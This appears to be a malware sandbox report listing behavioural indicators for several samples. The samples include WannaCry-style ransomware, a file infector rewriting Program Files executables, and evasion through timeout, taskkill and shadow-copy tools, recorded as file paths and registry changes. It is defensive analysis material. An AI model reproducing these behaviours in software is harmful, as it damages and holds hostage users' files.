File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpA9B.bmp" C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\PROGRA~2\MICROS~1\Office14\MSOSYNC.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\PPTICO.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\WI54FB~1\WMPDMC.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\1033\ONELEV.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\CLVIEW.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification \??\c:\program files (x86)\bitcoin C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\program files (x86)\word C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\COMMON~1\Adobe\Updater6\ADOBE_~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\TextConv\WksConv\Wkconv.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\BCSSync.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification \??\c:\program files (x86)\excel C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\program files (x86)\onenote C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\XLICONS.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WI54FB~1\wmpconfig.exe C:\Windows\svchost.com N/A
File opened for modification C:\Program Files (x86)\Microsoft\px9BD2.tmp C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\ACCICONS.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\MSQRY32.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WI54FB~1\wmplayer.exe C:\Windows\svchost.com N/A
File opened for modification \??\c:\program files (x86)\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\DW\DW20.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\IECONT~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\VPREVIEW.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\WINWORD.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WI4223~1\sidebar.exe C:\Windows\svchost.com N/A
File created C:\Program Files (x86)\Microsoft\DesktopLayer.exe C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Adobe\Updater6\ADOBEU~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WI54FB~1\wmprph.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\js\6.exe C:\Users\Admin\Desktop\6.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\LICLUA.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\excel C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\misc.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification \??\c:\program files\ C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\MSTORE.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\WORDICON.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~1\wabmig.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\Oarpmany.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\Adobe\READER~1.0\Reader\ACROBR~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~1\wab.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\WI54FB~1\wmpshare.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\Adobe\READER~1.0\SETUPF~1\{AC76B~1\Setup.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\GROOVEMN.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~1\wab.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~2\ACCESS~1\wordpad.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification \??\c:\program files (x86)\steam C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\NAMECO~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\WINWORD.EXE C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\WI54FB~1\wmprph.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GO664E~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\MSTORDB.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\WI54FB~1\setup_wm.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\Adobe\READER~1.0\Reader\A3DUTI~1.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\desktop C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\office C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\word C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\word C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\documents C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "411001014" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
